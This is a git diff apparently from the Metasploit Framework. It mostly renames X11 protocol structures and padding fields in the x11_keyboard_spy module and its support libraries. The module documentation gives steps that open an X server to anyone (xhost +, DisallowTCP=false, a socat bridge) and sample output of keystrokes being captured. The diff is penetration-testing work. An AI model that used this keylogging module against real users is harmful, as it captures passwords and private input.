diff --git a/documentation/modules/auxiliary/gather/x11_keyboard_spy.md b/documentation/modules/auxiliary/gather/x11_keyboard_spy.md
index 698e35608fcf..2e091014900a 100644
--- a/documentation/modules/auxiliary/gather/x11_keyboard_spy.md
+++ b/documentation/modules/auxiliary/gather/x11_keyboard_spy.md
@@ -19,21 +19,21 @@ displayed at poll time. Keys may be repeated or missing.
1. `sudo nano /etc/gdm/gdm.schemas`
2. Find:
-```
-
- security/DisallowTCP
- b
- true
-
-```
-- Change `true` to `false`
+ ```
+
+ security/DisallowTCP
+ b
+ true
+
+ ```
+ - Change `true` to `false`
3. logout or reboot
-4. Verification: `sudo netstat -antp | grep 6000`
+4. Verification: ```sudo netstat -antp | grep 6000```
-```
-tcp 0 0 0.0.0.0:6000 0.0.0.0:* LISTEN 1806/X
-```
+ ```
+ tcp 0 0 0.0.0.0:6000 0.0.0.0:* LISTEN 1806/X
+ ```
5. Now, to verify you allow ANYONE to get on X11, type: `xhost +`
@@ -42,17 +42,17 @@ tcp 0 0 0.0.0.0:6000 0.0.0.0:* LISTEN
1. `sudo nano /etc/lightdm/lightdm.conf`
2. Under the `[SeatDefaults]` area, add:
-```
-xserver-allow-tcp=true
-allow-guest=true
-```
+ ```
+ xserver-allow-tcp=true
+ allow-guest=true
+ ```
3. logout or reboot
-4. Verification: `sudo netstat -antp | grep 6000`
+4. Verification: ```sudo netstat -antp | grep 6000```
-```
-tcp 0 0 0.0.0.0:6000 0.0.0.0:* LISTEN 1806/X
-```
+ ```
+ tcp 0 0 0.0.0.0:6000 0.0.0.0:* LISTEN 1806/X
+ ```
5. Now, to verify you allow ANYONE to get on X11, type: `xhost +`
@@ -65,9 +65,9 @@ tcp 0 0 0.0.0.0:6000 0.0.0.0:* LISTEN
1. `vi /etc/gdm/custom.conf`
2. Under the `[security]` area, add:
-```
-DisallowTCP=false
-```
+ ```
+ DisallowTCP=false
+ ```
3. logout/reboot
4. Now, to verify you allow ANYONE to get on X11, type: `xhost +`
@@ -88,8 +88,7 @@ Getting X11 to listen on a TCP port is rather taxing, so we use socat to facilit
1. `sudo apt-get install ubuntu-desktop socat` # overkill but it gets everything we need
2. `sudo reboot` # prob a good idea since so much was installed
3. `sudo xhost +` # must be done through gui, not through SSH
-4. `socat -d -d TCP-LISTEN:6000,fork,bind= UNIX-CONNECT:/tmp/.X11-unix/X0`, you may need to
-use `X1` instead of `X0` depending on context.
+4. `socat -d -d TCP-LISTEN:6000,fork,bind= UNIX-CONNECT:/tmp/.X11-unix/X0`, you may need to use `X1` instead of `X0` depending on context.
## Verification Steps
@@ -122,23 +121,23 @@ msf6 auxiliary(gather/x11_keyboard_spy) > run
[*] Running module against 127.0.0.1
[*] 127.0.0.1:6000 - Establishing TCP Connection
-[*] 127.0.0.1:6000 - (1/9) Establishing X11 connection
+[*] 127.0.0.1:6000 - [1/9] Establishing X11 connection
[-] 127.0.0.1:6000 - Connection packet malfored (size: 8192), attempting to get read more data
[+] 127.0.0.1:6000 - Successly established X11 connection
[*] 127.0.0.1:6000 - Version: 11.0
[*] 127.0.0.1:6000 - Screen Resolution: 958x832
[*] 127.0.0.1:6000 - Resource ID: 33554432
[*] 127.0.0.1:6000 - Screen root: 1320
-[*] 127.0.0.1:6000 - (2/9) Checking on BIG-REQUESTS extension
+[*] 127.0.0.1:6000 - [2/9] Checking on BIG-REQUESTS extension
[+] 127.0.0.1:6000 - Extension BIG-REQUESTS is present with id 134
-[*] 127.0.0.1:6000 - (3/9) Enabling BIG-REQUESTS
-[*] 127.0.0.1:6000 - (4/9) Creating new graphical context
-[*] 127.0.0.1:6000 - (5/9) Checking on XKEYBOARD extension
+[*] 127.0.0.1:6000 - [3/9] Enabling BIG-REQUESTS
+[*] 127.0.0.1:6000 - [4/9] Creating new graphical context
+[*] 127.0.0.1:6000 - [5/9] Checking on XKEYBOARD extension
[+] 127.0.0.1:6000 - Extension XKEYBOARD is present with id 136
-[*] 127.0.0.1:6000 - (6/9) Enabling XKEYBOARD
-[*] 127.0.0.1:6000 - (7/9) Requesting XKEYBOARD map
-[*] 127.0.0.1:6000 - (8/9) Enabling notification on keyboard and map
-[*] 127.0.0.1:6000 - (9/9) Creating local keyboard map
+[*] 127.0.0.1:6000 - [6/9] Enabling XKEYBOARD
+[*] 127.0.0.1:6000 - [7/9] Requesting XKEYBOARD map
+[*] 127.0.0.1:6000 - [8/9] Enabling notification on keyboard and map
+[*] 127.0.0.1:6000 - [9/9] Creating local keyboard map
[+] 127.0.0.1:6000 - All setup, watching for keystrokes
t
e
diff --git a/lib/msf/core/exploit/remote/x11.rb b/lib/msf/core/exploit/remote/x11.rb
index 81bd61415e25..b87099d84a09 100644
--- a/lib/msf/core/exploit/remote/x11.rb
+++ b/lib/msf/core/exploit/remote/x11.rb
@@ -13,40 +13,43 @@ module Msf::Exploit::Remote::X11
include Msf::Exploit::Remote::X11::Keysymdef
include Msf::Exploit::Remote::X11::Window
- class X11GETPROPERTYRESPONSE < BinData::Record
+ # https://xcb.freedesktop.org/manual/structxcb__get__property__reply__t.html
+ class X11GetPropertyResponse < BinData::Record
endian :little
uint8 :reply
uint8 :format
uint16 :sequence_number # GetProperty
- uint32 :reply_length
+ uint32 :response_length
uint32 :get_property_type # 8bit boolean, \x01 == true \x00 == false
uint32 :bytes_after
uint32 :value_length
- uint32 :unused
- uint32 :unused1
- uint32 :unused2
+ uint32 :pad0
+ uint32 :pad1
+ uint32 :pad2
string :value_data, read_length: -> { value_length }
end
- class X11GETPROPERTYREQUEST < BinData::Record
+ # https://xcb.freedesktop.org/manual/structxcb__get__property__request__t.html
+ class X11GetPropertyRequest < BinData::Record
endian :little
uint8 :opcode, value: 20 # GetProperty
uint8 :delete_field, initial_value: 0 # \x00 false, assuming \x01 true?
uint16 :request_length, value: -> { num_bytes / 4 }
- uint32 :window # X11CONNECTION.screen_root
+ uint32 :window # X11ConnectionResponse.screen_root
uint32 :property, initial_value: 23 # "\x17\x00\x00\x00" RESOURCE_MANAGER
uint32 :get_property_type, initial_value: 31 # "\x1f\x00\x00\x00" # get-property-type (31 = string)
uint32 :long_offset, value: 0
uint32 :content_length, value: 100_000_000 # "\x00\xe1\xf5\x05"
end
- class X11CREATEGRAPHICALCONTEXTREQUEST < BinData::Record
+ # https://xcb.freedesktop.org/manual/structxcb__create__gc__request__t.html
+ class X11CreateGraphicalContextRequest < BinData::Record
endian :little
uint8 :opcode, value: 55 # CreateGC (CreateGraphicalContext)
- uint8 :unused
+ uint8 :pad0
uint16 :request_length, value: -> { num_bytes / 4 }
- uint32 :cid # X11CONNECTION.resource_id
- uint32 :drawable # X11CONNECTION.screen_root
+ uint32 :cid # X11ConnectionResponse.resource_id
+ uint32 :drawable # X11ConnectionResponse.screen_root
# gc-value-mask mappings from wireshark, uint32 total size
# .... .... .... .... .... .... .... ...0 = function: False
# .... .... .... .... .... .... .... ..0. = plane-mask: False
@@ -103,42 +106,47 @@ class X11CREATEGRAPHICALCONTEXTREQUEST < BinData::Record
uint32 :background, initial_value: 16777215
end
- class X11FREEGRAPHICALCONTEXTREQUEST < BinData::Record
+ # https://xcb.freedesktop.org/manual/structxcb__free__gc__request__t.html
+ class X11FreeGraphicalContextRequest < BinData::Record
endian :little
uint8 :opcode, value: 60 # FreeGC
- uint8 :unused, value: 1
+ uint8 :pad0, value: 1
uint16 :request_length, value: -> { num_bytes / 4 }
- uint32 :gc # X11CONNECTION.resource_id_base
+ uint32 :gc # X11ConnectionResponse.resource_id_base
end
- class X11GETINPUTFOCUSREQUEST < BinData::Record
+ # https://xcb.freedesktop.org/manual/structxcb__get__input__focus__request__t.html
+ class X11GetInputFocusRequest < BinData::Record
endian :little
uint8 :opcode, value: 43 # GetInputFocus
- uint8 :unused
+ uint8 :pad0
uint16 :request_length, value: -> { num_bytes / 4 }
end
- class X11INTERNATOMREQUEST < BinData::Record
+ # https://xcb.freedesktop.org/manual/structxcb__intern__atom__request__t.html
+ class X11InternAtomRequest < BinData::Record
endian :little
uint8 :opcode, value: 16 # InternAtom
uint8 :only_if_exists, initial_value: 0 # 0 false, 1 true?
uint16 :request_length, value: -> { num_bytes / 4 }
uint16 :name_length, value: -> { name.to_s.gsub(/\x00+\z/, '').length } # cut off the \x00 padding
- uint16 :unused, initial_value: 0
+ uint16 :pad0, initial_value: 0
string :name, trim_padding: true
end
- class X11INTERNATOMRESPONSE < BinData::Record
+ # https://xcb.freedesktop.org/manual/structxcb__intern__atom__reply__t.html
+ class X11InternAtomResponse < BinData::Record
endian :little
uint8 :reply
- uint8 :unused
+ uint8 :pad0
uint16 :sequence_number
- uint32 :reply_length
+ uint32 :response_length
uint32 :atom
- rest :pad
+ rest :pad1
end
- class X11ERROR < BinData::Record
+ # https://xcb.freedesktop.org/manual/structxcb__generic__error__t.html
+ class X11Error < BinData::Record
endian :little
uint8 :response_type # 0 = Error, 1 = Reply
uint8 :error_code # 8 = BadMatch
@@ -146,6 +154,6 @@ class X11ERROR < BinData::Record
uint32 :bad_value
uint16 :minor_opcode
uint16 :major_opcode
- uint8 :unused
+ uint8 :pad0
end
end
diff --git a/lib/msf/core/exploit/remote/x11/connect.rb b/lib/msf/core/exploit/remote/x11/connect.rb
index 742dc7aeb680..1099e6763ca1 100644
--- a/lib/msf/core/exploit/remote/x11/connect.rb
+++ b/lib/msf/core/exploit/remote/x11/connect.rb
@@ -8,7 +8,7 @@
module Msf::Exploit::Remote::X11::Connect
# https://xcb.freedesktop.org/manual/structxcb__visualtype__t.html
- class X11VISUALTYPE < BinData::Record
+ class X11VisualType < BinData::Record
endian :little
uint32 :visualid
uint8 :visual_type_classclass
@@ -20,35 +20,36 @@ class X11VISUALTYPE < BinData::Record
uint32 :pad
end
- class X11DEPTHDETAIL < BinData::Record
+ # https://xcb.freedesktop.org/manual/structxcb__depth__t.html
+ class X11DepthDetail < BinData::Record
endian :little
uint8 :depth
- uint8 :pad
+ uint8 :pad0
uint16 :visualtypes_numbers
uint32 :pad1
array :depth_detail,
- type: :X11VISUALTYPE,
+ type: :X11VisualType,
initial_length: :visualtypes_numbers
end
# https://xcb.freedesktop.org/manual/structxcb__format__t.html
- class X11PIXMAPFORMAT < BinData::Record
+ class X11PixMapFormat < BinData::Record
endian :little
uint8 :depth
uint8 :bits_per_pixel
uint8 :scanline_pad
- uint8 :pad
+ uint8 :pad0
uint32 :pad1
end
# https://xcb.freedesktop.org/manual/structxcb__setup__t.html
- class X11CONNECTION < BinData::Record
+ class X11ConnectionResponse < BinData::Record
endian :little
uint8 :success # 8bit boolean, \x01 == true \x00 == false
- uint8 :pad
+ uint8 :pad0
uint16 :protocol_version_major
uint16 :protocol_version_minor
- uint16 :reply_length
+ uint16 :response_length
uint32 :release_number
uint32 :resource_id_base
uint32 :resource_id_mask
@@ -63,10 +64,10 @@ class X11CONNECTION < BinData::Record
uint8 :bitmap_format_scanline_pad
uint8 :min_keycode
uint8 :max_keycode
- uint32 :pad2
+ uint32 :pad1
string :vendor, read_length: :vendor_length
array :pixmap_formats,
- type: :X11PIXMAPFORMAT,
+ type: :X11PixMapFormat,
initial_length: :number_of_formats_in_pixmap_formats
# screen subsection
@@ -87,20 +88,37 @@ class X11CONNECTION < BinData::Record
uint8 :screen_root_depth
uint8 :screen_allowed_depths_len
array :depth_detail,
- type: :X11DEPTHDETAIL,
+ type: :X11DepthDetail,
initial_length: :screen_allowed_depths_len
end
# https://xcb.freedesktop.org/manual/structxcb__setup__request__t.html
- class X11CONNECTIONREQUEST < BinData::Record
+ class X11ConnectionRequest < BinData::Record
# only 1/2 implemented since we dont have any authorization items added
endian :little
uint8 :byte_order, value: 108 # Little-endian
- uint8 :pad, value: 0
+ uint8 :pad0, value: 0
uint16 :protocol_version_major, value: 11
uint16 :protocol_version_minor, value: 0
uint16 :authorization_protocol_name_length, value: 0
uint16 :authorization_protocol_data_length, value: 0
- uint16 :pad2, value: 0
+ uint16 :pad1, value: 0
+ end
+
+ def print_connection_info(connection, ip, port)
+ print_good("#{ip} - Successly established X11 connection")
+ vprint_status(" Vendor: #{connection.vendor}")
+ vprint_status(" Version: #{connection.protocol_version_major}.#{connection.protocol_version_minor}")
+ vprint_status(" Screen Resolution: #{connection.screen_width_in_pixels}x#{connection.screen_height_in_pixels}")
+ vprint_status(" Resource ID: #{connection.resource_id_base.inspect}")
+ vprint_status(" Screen root: #{connection.screen_root.inspect}")
+ report_note(
+ host: ip,
+ proto: 'tcp',
+ sname: 'x11',
+ port: port,
+ type: 'x11.server_vendor',
+ data: "Open X Server (#{connection.vendor})"
+ )
end
end
diff --git a/lib/msf/core/exploit/remote/x11/extensions.rb b/lib/msf/core/exploit/remote/x11/extensions.rb
index e1fdcd3c1e2f..6ad5c53083b1 100644
--- a/lib/msf/core/exploit/remote/x11/extensions.rb
+++ b/lib/msf/core/exploit/remote/x11/extensions.rb
@@ -8,12 +8,12 @@
module Msf::Exploit::Remote::X11::Extensions
# https://xcb.freedesktop.org/manual/structxcb__query__extension__reply__t.html
- class QUERYEXTENSIONRESPONSE < BinData::Record
+ class X11QueryExtensionResponse < BinData::Record
endian :little
uint8 :reply
uint8 :pad
uint16 :sequence_number # QueryExtension
- uint32 :reply_length
+ uint32 :response_length
uint8 :present # 8bit boolean, \x01 == true \x00 == false
uint8 :major_opcode # this is the ID of the extension
uint8 :first_event
@@ -21,19 +21,19 @@ class QUERYEXTENSIONRESPONSE < BinData::Record
end
# https://xcb.freedesktop.org/manual/structxcb__query__extension__request__t.html
- class QUERYEXTENSION < BinData::Record
+ class X11QueryExtensionRequest < BinData::Record
endian :little
uint8 :opcode, value: 98 # QueryExtension
- uint8 :pad, value: 0
+ uint8 :pad0, value: 0
uint16 :request_length, value: -> { num_bytes / 4 }
uint16 :extension_length, value: -> { extension.to_s.gsub(/\x00+\z/, '').length } # cut off the \x00 padding
- uint16 :pad2, initial_value: 0 # seems to possibly be a counter for how many times this has been called
+ uint16 :pad1, initial_value: 0 # seems to possibly be a counter for how many times this has been called
string :extension, length: 12, trim_padding: true
end
- class EXTENSIONTOGGLE < BinData::Record
+ class X11ExtensionToggleRequest < BinData::Record
endian :little
- uint8 :opcode # X11QUERYEXTENSIONRESPONSE.major-opcode
+ uint8 :opcode # X11QueryExtensionResponse.major-opcode
uint8 :toggle, initial_value: 0 # 0 enable
uint16 :request_length, value: -> { num_bytes / 4 }
uint16 :wanted_major, onlyif: :versions? # extension major version
diff --git a/lib/msf/core/exploit/remote/x11/keysymdef.rb b/lib/msf/core/exploit/remote/x11/keysymdef.rb
index 2a9570f11d45..82ca1ae37365 100644
--- a/lib/msf/core/exploit/remote/x11/keysymdef.rb
+++ b/lib/msf/core/exploit/remote/x11/keysymdef.rb
@@ -10,7 +10,7 @@
#
module Msf::Exploit::Remote::X11::Keysymdef
- KEYSYM_HASH = {
+ X11KEYSYM_HASH = {
65288 => '[BackSpace]', # XK_BackSpace
65289 => '[Tab]', # XK_Tab
65290 => '[Linefeed]', # XK_Linefeed
diff --git a/lib/msf/core/exploit/remote/x11/window.rb b/lib/msf/core/exploit/remote/x11/window.rb
index e1d5d40fd7f0..908f4e43b99a 100644
--- a/lib/msf/core/exploit/remote/x11/window.rb
+++ b/lib/msf/core/exploit/remote/x11/window.rb
@@ -9,16 +9,16 @@
module Msf::Exploit::Remote::X11::Window
# 3 = https://xcb.freedesktop.org/manual/structxcb__get__window__attributes__request__t.html
# 14 = https://xcb.freedesktop.org/manual/structxcb__get__geometry__request__t.html
- class GETREQUEST < BinData::Record
+ class X11GetRequest < BinData::Record
endian :little
uint8 :opcode # 3 = GetWindowAttributes, 14 = GetGeometry
- uint8 :unused # XXX seems to be increasing counter...
+ uint8 :pad # XXX seems to be increasing counter...
uint16 :request_length, value: -> { num_bytes / 4 }
- uint32 :window # X11CONNECTION.screen_root
+ uint32 :window # X11ConnectionResponse.screen_root
end
# https://xcb.freedesktop.org/manual/structxcb__get__window__attributes__reply__t.html
- class GETWINDOWATTRIBUTESRESPONSE < BinData::Record
+ class X11GetWindowAttributeResponse < BinData::Record
endian :little
uint8 :depth
uint16 :visual_id
@@ -38,7 +38,7 @@ class GETWINDOWATTRIBUTESRESPONSE < BinData::Record
end
# https://xcb.freedesktop.org/manual/structxcb__get__geometry__reply__t.html
- class GETGEOMETRYRESPONSE < BinData::Record
+ class X11GetGeometryResponse < BinData::Record
endian :little
uint8 :depth
uint32 :root
@@ -50,12 +50,12 @@ class GETGEOMETRYRESPONSE < BinData::Record
end
# https://xcb.freedesktop.org/manual/structxcb__get__geometry__reply__t.html
- class WINDOWATTRIBUTESGETGEOMETRYRESPONSE < BinData::Record
+ class X11GetWindowAttributesGeometryResponse < BinData::Record
endian :little
uint8 :reply
uint8 :depth
uint16 :sequence_number
- uint32 :reply_length
+ uint32 :response_length
uint32 :root
uint16 :x
uint16 :y
@@ -65,33 +65,33 @@ class WINDOWATTRIBUTESGETGEOMETRYRESPONSE < BinData::Record
end
# https://xcb.freedesktop.org/manual/structxcb__translate__coordinates__request__t.html
- class TRANSLATECOORDINATESREQUEST < BinData::Record
+ class X11TranslateCoordinatesRequest < BinData::Record
endian :little
uint8 :opcode, value: 40 # TranslateCoordinates
- uint8 :unused # XXX seems to be increasing counter...
+ uint8 :pad # XXX seems to be increasing counter...
uint16 :request_length, value: -> { num_bytes / 4 }
- uint32 :src_window # X11CONNECTION.screen_root
- uint32 :dst_window # X11CONNECTION.screen_root
+ uint32 :src_window # X11ConnectionResponse.screen_root
+ uint32 :dst_window # X11ConnectionResponse.screen_root
uint16 :src_x
uint16 :src_y
end
# https://xcb.freedesktop.org/manual/structxcb__query__tree__request__t.html
- class QUERYTREEREQUEST < BinData::Record
+ class X11QueryTreeRequest < BinData::Record
endian :little
uint8 :opcode, value: 15 # QueryTree
- uint8 :unused, initial_value: 1 # XXX counter?
+ uint8 :pad, initial_value: 1 # XXX counter?
uint16 :request_length, value: -> { num_bytes / 4 }
- uint32 :drawable # X11CONNECTION.screen_root
+ uint32 :drawable # X11ConnectionResponse.screen_root
end
# https://xcb.freedesktop.org/manual/structxcb__query__tree__reply__t.html
- class QUERYTREERESPONSE < BinData::Record
+ class X11QueryTreeResponse < BinData::Record
endian :little
uint8 :reply
- uint8 :unused
+ uint8 :pad0
uint16 :sequence_number
- uint32 :reply_length
+ uint32 :response_length
uint32 :root_window
uint32 :parent_window
uint32 :children_len
@@ -104,12 +104,12 @@ class QUERYTREERESPONSE < BinData::Record
end
# https://xcb.freedesktop.org/manual/structxcb__get__image__request__t.html
- class GETIMAGEREQUEST < BinData::Record
+ class X11GetImageRequest < BinData::Record
endian :little
uint8 :opcode, value: 73 # GetImage
uint8 :image_pixmap_format, initial_value: 2 # zpixmap, better than 0 xypixmap
uint16 :request_length, value: -> { num_bytes / 4 }
- uint32 :drawable # window/X11CONNECTION.screen_root
+ uint32 :drawable # window/X11ConnectionResponse.screen_root
uint16 :x
uint16 :y
uint16 :width
@@ -118,23 +118,23 @@ class GETIMAGEREQUEST < BinData::Record
end
# https://xcb.freedesktop.org/manual/structxcb__get__image__reply__t.html
- class GETIMAGERESPONSE < BinData::Record
+ class X11GetImageResponse < BinData::Record
endian :little
uint8 :response_type
uint8 :depth
uint16 :sequence_number
- uint32 :reply_length
+ uint32 :response_length
uint32 :visual_id
array :image_data,
type: :uint8,
- initial_length: :reply_length
+ initial_length: :response_length
end
# https://xcb.freedesktop.org/manual/structxcb__query__colors__request__t.html
- class GETCOLORSREQUEST < BinData::Record
+ class X11GetColorsRequest < BinData::Record
endian :little
uint8 :opcode, value: 91 # QueryColors
- uint8 :unused
+ uint8 :pad0
uint16 :request_length, value: -> { num_bytes / 4 }
uint32 :color_map
array :pixels,
@@ -142,34 +142,35 @@ class GETCOLORSREQUEST < BinData::Record
read_until: :eof
end
- class COLOR < BinData::Record
+ # https://xcb.freedesktop.org/manual/structxcb__rgb__t.html -ish, as the first pixel seems unused
+ class X11Color < BinData::Record
endian :little
- uint16 :pixel
+ uint16 :pad0
uint16 :red
uint16 :green
uint16 :blue
end
# https://xcb.freedesktop.org/manual/structxcb__query__colors__reply__t.html
- class GETCOLORSRESPONSE < BinData::Record
+ class X11GetColorsResponse < BinData::Record
endian :little
uint8 :response_type
- uint8 :unused
+ uint8 :pad0
uint16 :sequence
- uint32 :reply_length
+ uint32 :response_length
uint16 :colors_len
array :colors,
initial_length: :colors_len,
- type: :COLOR
+ type: :X11Color
end
# https://xcb.freedesktop.org/manual/structxcb__get__window__attributes__reply__t.html
- class GETWINDOWRESPONSE < BinData::Record
+ class X11GetWindowResponse < BinData::Record
endian :little
uint8 :response_type
uint8 :backing_store
uint16 :sequence_number
- uint32 :reply_length
+ uint32 :response_length
uint32 :visual_id
uint16 :window_class
bit8 :bit_gravity
@@ -190,6 +191,24 @@ class GETWINDOWRESPONSE < BinData::Record
end
end
+def create_overlay_map(screen_width, screen_height, windows)
+ # Initialize a 2D array to represent the screen
+ screen = Array.new(screen_height) { Array.new(screen_width, nil) }
+ windows.each_with_index do |window, i|
+ puts window.inspect
+ x, y, width, height = window
+ # Mark the visible region occupied by the window
+ (y...y + height).each do |row|
+ (x...x + width).each do |col|
+ screen[row][col] = i
+ end
+ end
+ end
+ screen.each do |row|
+ puts row.join('')
+ end
+end
+
class X11Image
def initialize(width, height, image_reply, color_reply)
@width = width
@@ -214,6 +233,14 @@ def create_image
# Set pixel color in the image
image[i % width, i / width] = ChunkyPNG::Color.rgb(color.red, color.green, color.blue)
end
+ # (0...height).each do |y|
+ # (0...width).each do |x|
+ # # Extract color information from the pixel data and set the corresponding pixel in the PNG image
+ # color = colors[y+x]
+ # # pixel_color = extract_color_from_z_data(z_data)
+ # image[x, y] = ChunkyPNG::Color.rgb(color.red, color.green, color.blue)
+ # end
+ # end
image
end
diff --git a/lib/msf/core/exploit/remote/x11/xkeyboard.rb b/lib/msf/core/exploit/remote/x11/xkeyboard.rb
index c855c9001276..af85f4fe32a1 100644
--- a/lib/msf/core/exploit/remote/x11/xkeyboard.rb
+++ b/lib/msf/core/exploit/remote/x11/xkeyboard.rb
@@ -7,18 +7,21 @@
#
module Msf::Exploit::Remote::X11::Xkeyboard
- class KEYMODMAP < BinData::Record
+ # https://xcb.freedesktop.org/manual/structxcb__xkb__key__mod__map__t.html
+ class X11KeyModMap < BinData::Record
endian :little
uint8 :keycode
uint8 :mods # bit array, shift, lock, control, 1, 2, 3, 4, 5
end
- class SYM < BinData::Record
+ # https://xcb.freedesktop.org/manual/structxcb__xkb__key__sym__map__iterator__t.html
+ class X11Sym < BinData::Record
endian :little
uint32 :syms
end
- class KEYSYMENTRY < BinData::Record
+ # https://xcb.freedesktop.org/manual/structxcb__xkb__key__sym__map__t.html
+ class X11KeySymEntry < BinData::Record
endian :little
uint32 :kt_index
uint8 :group_info
@@ -26,18 +29,20 @@ class KEYSYMENTRY < BinData::Record
uint16 :n_syms
# next we have a list of syms, length is n_syms
array :key_sym_array,
- type: :SYM,
+ type: :X11Sym,
initial_length: :n_syms
end
- class MODDEF < BinData::Record
+ # https://xcb.freedesktop.org/manual/structxcb__xkb__mod__def__t.html
+ class X11ModDef < BinData::Record
endian :little
uint8 :mask
uint8 :real_mods
uint16 :vmods
end
- class KEYMAPENTRY < BinData::Record
+ # https://xcb.freedesktop.org/manual/structxcb__xkb__kt__map__entry__t.html
+ class X11KeyMapEntry < BinData::Record
endian :little
uint8 :active
uint8 :mods_mask # bit array, shift, lock, control, 1, 2, 3, 4, 5
@@ -47,7 +52,8 @@ class KEYMAPENTRY < BinData::Record
uint16 :pad
end
- class KEYTYPE < BinData::Record
+ # https://xcb.freedesktop.org/manual/structxcb__xkb__key__type__t.html
+ class X11KeyType < BinData::Record
endian :little
uint8 :mods_mask
uint8 :mods_mods
@@ -58,16 +64,17 @@ class KEYTYPE < BinData::Record
uint8 :pad
# next we have a list of KEYMAPENTRY, length is :n_map_entries
array :key_map_array,
- type: :KEYMAPENTRY,
+ type: :X11KeyMapEntry,
initial_length: :n_map_entries
# not sure how to tell how many of these there are
array :key_mods_array,
- type: :MODDEF,
+ type: :X11ModDef,
initial_length: :n_map_entries,
onlyif: -> { has_preserve == 1 }
end
- class GETMAPREQUEST < BinData::Record
+ # https://xcb.freedesktop.org/manual/structxcb__xkb__get__map__request__t.html
+ class X11GetMapRequest < BinData::Record
endian :little
uint8 :xkeyboard_id # opcode
uint8 :extension_minor, value: 8 # GetMap
@@ -144,13 +151,14 @@ class GETMAPREQUEST < BinData::Record
uint16 :pad
end
- class GETMAPREPLY < BinData::Record
+ # https://xcb.freedesktop.org/manual/structxcb__xkb__get__map__reply__t.html
+ class X11GetMapReply < BinData::Record
endian :little
uint8 :reply
uint8 :device_id
uint16 :sequence_number # xkb-GetMap
- uint32 :reply_length
- uint16 :pad
+ uint32 :response_length
+ uint16 :pad0
uint8 :min_key_code
uint8 :max_key_code
uint16 :presents # needs to be converted to bits...
@@ -179,15 +187,15 @@ class GETMAPREPLY < BinData::Record
uint16 :virtual_mods # bit array
# next we have a list of KEYTYPE, length is :total_types
array :key_types_array,
- type: :KEYTYPE,
+ type: :X11KeyType,
initial_length: :n_types
- # next we have a list of KEYSYMENTRY
+ # next we have a list of X11KeySymEntry
array :key_map_array,
- type: :KEYSYMENTRY,
+ type: :X11KeySymEntry,
initial_length: :n_key_sym
- # next we have a list of KEYMODMAP
+ # next we have a list of X11KeyModMap
array :key_mod_map_array,
- type: :KEYMODMAP,
+ type: :X11KeyModMap,
initial_length: :total_mod_map_key
uint16 :pad2, onlyif: :padding? # this onlyif may be wrong, its a guess for the time being
@@ -196,7 +204,8 @@ def padding?
end
end
- class SELECTEVENTS < BinData::Record
+ # https://xcb.freedesktop.org/manual/structxcb__xkb__select__events__request__t.html
+ class X11SelectEvents < BinData::Record
endian :little
uint8 :xkeyboard_id # opcode
uint8 :extension_minor, value: 1 # SelectEvent
@@ -339,26 +348,29 @@ class SELECTEVENTS < BinData::Record
bit8 :new_keyboard_details_null_pad2, value: 0, onlyif: -> { affect_which_new_keyboard_notify == 1 } # may be others but thats all thats observed and implemented at this point
end
- class QUERYKEYMAPREQUEST < BinData::Record
+ # https://xcb.freedesktop.org/manual/structxcb__query__keymap__request__t.html
+ class X11QueryKeyMapRequest < BinData::Record
endian :little
uint8 :opcode, value: 44 # QueryKeymap
uint8 :pad
uint16 :request_length, value: -> { num_bytes / 4 }
end
- class QUERYKEYMAPREPLY < BinData::Record
+ # https://xcb.freedesktop.org/manual/structxcb__query__keymap__reply__t.html
+ class X11QueryKeyMapReply < BinData::Record
endian :little
uint8 :reply
uint8 :pad
uint16 :sequence_number
- uint32 :reply_length
+ uint32 :response_length
# byte sequence
array :data,
type: :uint8,
read_until: :eof
end
- class BELLREQUEST < BinData::Record
+ # https://xcb.freedesktop.org/manual/structxcb__xkb__bell__request__t.html
+ class X11BellRequest < BinData::Record
endian :little
uint8 :xkeyboard_id # opcode
uint8 :extension_minor, value: 3 # Bell
@@ -369,10 +381,10 @@ class BELLREQUEST < BinData::Record
uint8 :percent, initial_value: 50 # xxx do we want to change this?
uint8 :force_sound, initial_value: 0 # 0 = false, 1 true?
uint8 :sound_only, initial_value: 0 # 0 = false, 1 true?
- uint8 :pad
+ uint8 :pad0
uint16 :pitch, initial_value: 0
uint16 :duration, initial_value: 0
- uint16 :pad2
+ uint16 :pad1
uint32 :name, initial_value: 814 # XXX do we see this elsewhere?
uint32 :window
end
diff --git a/modules/auxiliary/gather/x11_keyboard_spy.rb b/modules/auxiliary/gather/x11_keyboard_spy.rb
index 9efb6d3189cd..ecb1c8f9feb2 100644
--- a/modules/auxiliary/gather/x11_keyboard_spy.rb
+++ b/modules/auxiliary/gather/x11_keyboard_spy.rb
@@ -60,7 +60,7 @@ def check
vprint_status('Establishing TCP Connection')
connect # tcp connection establish
vprint_status('Attempting X11 connection')
- sock.put(X11CONNECTIONREQUEST.new.to_binary_s) # x11 session establish
+ sock.put(X11ConnectionRequest.new.to_binary_s) # x11 session establish
connection = process_initial_connection_response(sock.get_once(-1, 1))
if connection.success == 1
return Exploit::CheckCode::Appears('Successfully established X11 connection')
@@ -71,12 +71,12 @@ def check
def process_initial_connection_response(packet)
begin
- connection = X11CONNECTION.read(packet)
+ connection = X11ConnectionResponse.read(packet)
rescue EOFError
vprint_bad("Connection packet malformed (size: #{packet.length}), attempting to get read more data")
packet += sock.get_once(-1, 1)
begin
- connection = X11CONNECTION.read(packet)
+ connection = X11ConnectionResponse.read(packet)
rescue StandardError
fail_with(Msf::Module::Failure::UnexpectedReply, 'Failed to parse X11 connection initialization response packet')
end
@@ -86,7 +86,7 @@ def process_initial_connection_response(packet)
def process_extension_query(packet, extension)
begin
- extension_response = QUERYEXTENSIONRESPONSE.read(packet)
+ extension_response = X11QueryExtensionResponse.read(packet)
rescue ::EOFError
packet += sock
fail_with(Msf::Module::Failure::UnexpectedReply, "Unable to process QueryExtension Response. Raw packet: #{packet}")
@@ -117,8 +117,8 @@ def build_sym_key_map(map_data)
character = sym.chr
character = '[space]' if character == ' '
rescue RangeError
- if KEYSYM_HASH.key? sym
- character = KEYSYM_HASH[sym]
+ if X11KEYSYM_HASH.key? sym
+ character = X11KEYSYM_HASH[sym]
else
character = "Unknown key sym: #{sym}"
end
@@ -158,8 +158,8 @@ def run
vprint_status('Establishing TCP Connection')
connect # tcp connection establish
- vprint_status('(1/9) Establishing X11 connection')
- sock.put(X11CONNECTIONREQUEST.new.to_binary_s) # x11 session establish
+ vprint_status('[1/9] Establishing X11 connection')
+ sock.put(X11ConnectionRequest.new.to_binary_s) # x11 session establish
data = sock.get_once(-1, 1)
fail_with(Msf::Module::Failure::UnexpectedReply, 'Port connected, but no response to X11 connection attempt') if data.nil?
connection = process_initial_connection_response(data)
